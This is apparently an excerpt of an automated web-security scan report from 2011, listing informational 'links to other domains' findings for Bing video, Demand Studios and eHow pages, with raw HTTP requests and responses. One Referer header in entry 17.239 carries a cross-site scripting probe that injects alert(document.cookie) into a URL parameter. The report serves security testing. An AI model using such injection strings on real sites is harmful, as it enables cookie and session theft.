<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

17.237. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=936d4b55-dc21-41a0-b7b8-d61d1bc7dd66&w=400&h=300&so=4
http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4
http://mail.live.com/
http://movies.msn.com/
http://movies.msn.com/comingsoon
http://movies.msn.com/movies/movie.aspx?m=2285953
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fthe-roommate-exclusive-clip-just-doing-my-job%2f5tbba1k%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.msn.com/

Request

GET /videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=899
Content-Length: 75919
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:58:19 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:19 GMT
Connection: close
Set-Cookie: _SS=SID=31EFF7636D574F7BA5884FAD55FD907C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0827e1c55a2041e9a39fafe6f361e71d; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k" /><link rel="image_src" href="http://img4.catalog.video.msn.com/Image.aspx?uuid=936d4b55-dc21-41a0-b7b8-d61d1bc7dd66&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fthe-roommate-exclusive-clip-just-doing-my-job%2f5tbba1k%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.msn.com/movies/movie.aspx?m=2285953" data-instName="InfoRelatedLinks">Learn more about 'The Roommate'</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.msn.com/comingsoon" data-instName="InfoRelatedLinks">Coming Soon</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.msn.com/" data-instName="InfoRelatedLinks">MSN Movies</a>
...[SNIP]...
didn’t see his shadow at Gobbler’s Knob in Pennsylvania, a supposed sign that warmer weather is not far away." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=6b3222e0-1445-4e17-b419-d0fcb848ef05&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;cancellation of more than 6,000 flights and prompting power outages from Texas to Michigan. NBC's Kevin Tibbles reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=b90d1eb0-1315-45d7-9f04-a6ffe5ab7739&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
playerUrl"
title="Steelers' linebacker James Harrison jokes around about not hurting any Packers player during the Super Bowl." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=47523ab5-14fb-4760-9679-3f871b32eb18&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
erUrl"
title="Filmed in Blairgowrie, Australia, this beautiful little octopus had no problems squeezing itself out of a bottle." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
title="Chomping at the bit to support your team? Get in the game by learning to heckle the other team's fans." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9f193ac5-0949-4608-890c-6e99b792f2de&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

17.238. http://www.demandstudios.com/ehow-writers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.demandstudios.com
Path:	/ehow-writers.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.demandstudios.com/ehow-writers.html?utm_source=EHOWcom&utm_medium=banner&utm_campaign=ehow

The response contains the following links to other domains:

http://b.scorecardresearch.com/b?c1=2&c2=6036385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://images.scanalert.com/meter/survey/www.demandstudios.com/13.gif
http://www.addthis.com/bookmark.php?v=20
http://www.demandmedia.com/
http://www.la.bbb.org/Business-Report/Demand-Studios-100095484
https://edge.quantserve.com/quant.js
https://pixel.quantserve.com/pixel/p-4dIM5nVs2rFio.gif?labels=Demand%20Media%20Corporate
https://s7.addthis.com/js/250/addthis_widget.js
https://s7.addthis.com/static/btn/lg-share-en.gif
https://vs.dmtracker.com/images/zig.gif?Log=1
https://vs.dmtracker.com/tags/vs.js
https://www.mcafeesecure.com/RatingVerify?ref=www.demandstudios.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: BIGipServerdemandstudios.com-69.64.153.116-80=622659338.20480.0000; path=/ ; domain=demandstudios.com; path=/
Set-Cookie: ASP.NET_SessionId=jml0dc45u3d03kfyr3ptnm45; path=/; HttpOnly
Set-Cookie: DemandStudiosContributorApplication=utm_source=EHOWcom&utm_medium=banner&utm_campaign=ehow&url_referrer=&migration_group=; expires=Fri, 04-Mar-2011 15:44:39 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22419

<!doctype html>
<html lang="en-US">

<head>
   <title>Write for eHow | Demand Media Studios</title>
   <meta charset="UTF-8"/>

   <link href="/ui/images/favicon.ico" rel="shortcut icon" />

   <
...[SNIP]...

                           <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pub=dmseo"></script>
                           <a href="http://www.addthis.com/bookmark.php?v=20" rel="nofollow" onclick="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="https://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a>
...[SNIP]...
<p class="image"><a href="http://www.la.bbb.org/Business-Report/Demand-Studios-100095484"><img src="/ui/images/logos/bbb.gif" width="135" height="52" border="0"></a><a href="http://www.demandmedia.com"><img id="dmlogo" src="/ui/images/v2/dm.gif" alt="Freelance Jobs"/>
...[SNIP]...
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.demandstudios.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/survey/www.demandstudios.com/13.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<noscript>
<img src="https://vs.dmtracker.com/images/zig.gif?Log=1" />
</noscript>
<script src="https://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
<noscript> <img src="https://pixel.quantserve.com/pixel/p-4dIM5nVs2rFio.gif?labels=Demand%20Media%20Corporate" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6036385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

17.239. http://www.ehow.com/MailingList.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/MailingList.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.ehow.com/MailingList.html?category=Computer+Software

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=6404182704353790?
http://ad.doubleclick.net/jump/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=6404182704353790?
http://b.scorecardresearch.com/b?c1=2&c2=6036385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/_ui/lipstick/images/misc/loading.gif
http://ui.ehowcdn.com/_ui/lipstick/images/misc/pixel.gif
http://ui.ehowcdn.com/_ui/skins/corporate/images/ehow-logo.png
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css
http://ui.ehowcdn.com/content/compressed/en-US/footer-pages-kCWYtA.css
http://ui.ehowcdn.com/images/favicon.ico
http://vs.dmtracker.com/images/zig.gif?Log=1
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi
http://www.livestrong.com/
https://trustsealinfo.verisign.com/splash?dn=www.ehow.com&lang=en

Request

GET /MailingList.html?category=Computer+Software HTTP/1.1
Host: www.ehow.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(document.cookie)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.3.10.1296659524; rsi_segs=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:44:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 31329

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow of the Day | eHow.com</title>
       <meta chars
...[SNIP]...
<meta name="alexaVerifyID" content="xlJch1oUHrXNtOQBpiuUCV0-rlc" />

       <link href="http://ui.ehowcdn.com/images/favicon.ico" rel="shortcut icon" />


       <script type="text/javascript">
...[SNIP]...
</script>
       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css"/>


       <style type="text/css">
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/footer-pages-kCWYtA.css"/>

<meta name="description" content="Get the eHow of the Day delivered directly to your inbox! Learn something new each and every day with the eHow of the Day. Learn how to do just about anything
...[SNIP]...
<a href="http://www.ehow.com/" title="eHow - How to Videos & Articles"><img src="http://ui.ehowcdn.com/_ui/skins/corporate/images/ehow-logo.png" alt="eHow - How to do just about everything" /></a>
...[SNIP]...
<noscript>
   <a href="http://ad.doubleclick.net/jump/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=6404182704353790?" target="_blank">
       <img src="http://ad.doubleclick.net/ad/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=6404182704353790?" width="249"
           height="77" border="0" alt="" />
   </a>
...[SNIP]...
</script>-->
                       <a href="https://trustsealinfo.verisign.com/splash?dn=www.ehow.com&lang=en" onclick="return verisignWindow(this)"><img src="http://ui.ehowcdn.com/_ui/lipstick/images/misc/pixel.gif" class="LazyLoadImage" longdesc="http://ui.ehowcdn.com/_ui/lipstick/images/misc/verisign-seal.png"></a>
...[SNIP]...
<dd><a href="http://www.livestrong.com/">Livestrong</a>
...[SNIP]...
</dl>

    <img class="LazyLoadImage" src="http://ui.ehowcdn.com/_ui/lipstick/images/misc/pixel.gif" longdesc="http://ui.ehowcdn.com/_ui/lipstick/images/comscore/DemandMedia.gif" alt="Demand Media" />


           </div>
...[SNIP]...
<noscript><img src="http://vs.dmtracker.com/images/zig.gif?Log=1" alt="zig" /></noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=6036385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt=""/></noscript>
...[SNIP]...
<p><img src="http://ui.ehowcdn.com/_ui/lipstick/images/misc/loading.gif" alt="Loading"/></p>
           </div>
       </div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

17.240. http://www.ehow.com/MailingList.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/MailingList.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.ehow.com/MailingList.html?category=Computer+Software

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=3181623571171250?
http://ad.doubleclick.net/jump/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=3181623571171250?
http://b.scorecardresearch.com/b?c1=2&c2=6036385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/_ui/lipstick/images/misc/loading.gif
http://ui.ehowcdn.com/_ui/lipstick/images/misc/pixel.gif
http://ui.ehowcdn.com/_ui/skins/corporate/images/ehow-logo.png
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css
http://ui.ehowcdn.com/content/compressed/en-US/footer-pages-kCWYtA.css
http://ui.ehowcdn.com/images/favicon.ico
http://vs.dmtracker.com/images/zig.gif?Log=1
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi
http://www.livestrong.com/
https://trustsealinfo.verisign.com/splash?dn=www.ehow.com&lang=en

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31329
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 02 Feb 2011 15:14:52 GMT

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow of the Day | eHow.com</title>
       <meta chars
...[SNIP]...
<meta name="alexaVerifyID" content="xlJch1oUHrXNtOQBpiuUCV0-rlc" />

       <link href="http://ui.ehowcdn.com/images/favicon.ico" rel="shortcut icon" />


       <script type="text/javascript">
...[SNIP]...
</script>
       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css"/>


       <style type="text/css">
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/footer-pages-kCWYtA.css"/>

<meta name="description" content="Get the eHow of the Day delivered directly to your inbox! Learn something new each and every day with the eHow of the Day. Learn how to do just about anything
...[SNIP]...
<a href="http://www.ehow.com/" title="eHow - How to Videos & Articles"><img src="http://ui.ehowcdn.com/_ui/skins/corporate/images/ehow-logo.png" alt="eHow - How to do just about everything" /></a>
...[SNIP]...
<noscript>
   <a href="http://ad.doubleclick.net/jump/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=3181623571171250?" target="_blank">
       <img src="http://ad.doubleclick.net/ad/dmd.ehow/gen;vid=0;ugc=0%QC%;%RSI%tile=1;dcopt=ist;sz=249x77;ord=3181623571171250?" width="249"
           height="77" border="0" alt="" />
   </a>
...[SNIP]...
</script>-->
                       <a href="https://trustsealinfo.verisign.com/splash?dn=www.ehow.com&lang=en" onclick="return verisignWindow(this)"><img src="http://ui.ehowcdn.com/_ui/lipstick/images/misc/pixel.gif" class="LazyLoadImage" longdesc="http://ui.ehowcdn.com/_ui/lipstick/images/misc/verisign-seal.png"></a>
...[SNIP]...
<dd><a href="http://www.livestrong.com/">Livestrong</a>
...[SNIP]...
</dl>

    <img class="LazyLoadImage" src="http://ui.ehowcdn.com/_ui/lipstick/images/misc/pixel.gif" longdesc="http://ui.ehowcdn.com/_ui/lipstick/images/comscore/DemandMedia.gif" alt="Demand Media" />


           </div>
...[SNIP]...
<noscript><img src="http://vs.dmtracker.com/images/zig.gif?Log=1" alt="zig" /></noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=6036385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt=""/></noscript>
...[SNIP]...
<p><img src="http://ui.ehowcdn.com/_ui/lipstick/images/misc/loading.gif" alt="Loading"/></p>
           </div>
       </div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

17.241. http://www.ehow.com/account/facebook_merge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/facebook_merge.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ehow.com/account/facebook_merge.aspx?error=duplicate_email&email=

The response contains the following links to other domains:

http://ui.ehowcdn.com/content/compressed/en-US/account-f39xvQ.css
http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css
http://ui.ehowcdn.com/content/compressed/en-US/ieHacks-EJ3dvQ.css

Request

GET /account/facebook_merge.aspx?error=duplicate_email&email= HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8148

<!DOCTYPE html>
<html>
<head>
   <title>Connecting via Facebook</title>

       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css"/>

       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/account-f39xvQ.css"/>

       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/ieHacks-EJ3dvQ.css"/>


       <style>
...[SNIP]...

17.242. http://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ehow.com/account/simple_login.aspx?afterLogin=

The response contains the following links to other domains:

http://ui.ehowcdn.com/content/compressed/en-US/account-f39xvQ.css
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css
http://ui.ehowcdn.com/content/compressed/en-US/ieHacks-EJ3dvQ.css
http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js
http://vs.dmtracker.com/images/zig.gif?Log=1
http://vs.dmtracker.com/tags/vs.js

Request

GET /account/simple_login.aspx?afterLogin= HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7187

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2" content="Login" />
       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css"/>

       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/account-f39xvQ.css"/>

       <link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/ieHacks-EJ3dvQ.css"/>

       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>

       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js"></script>
...[SNIP]...
<noscript><img src="http://vs.dmtracker.com/images/zig.gif?Log=1" alt="zig" /></noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

17.243. http://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ehow.com/account/simple_register.aspx?afterLogin=submit_frmMail

The response contains the following links to other domains:

http://ui.ehowcdn.com/content/compressed/en-US/account-f39xvQ.css
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css
http://ui.ehowcdn.com/content/compressed/en-US/ieHacks-EJ3dvQ.css
http://ui.ehowcdn.com/content/compressed/en-US/simple-login-XGxhHA.js
http://vs.dmtracker.com/images/zig.gif?Log=1
http://vs.dmtracker.com/tags/vs.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <title>Register fo
...[SNIP]...
<meta name="pagetype" scheme="DMINSTR2" content="Register" />

<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/common-kvgh0g.css"/>

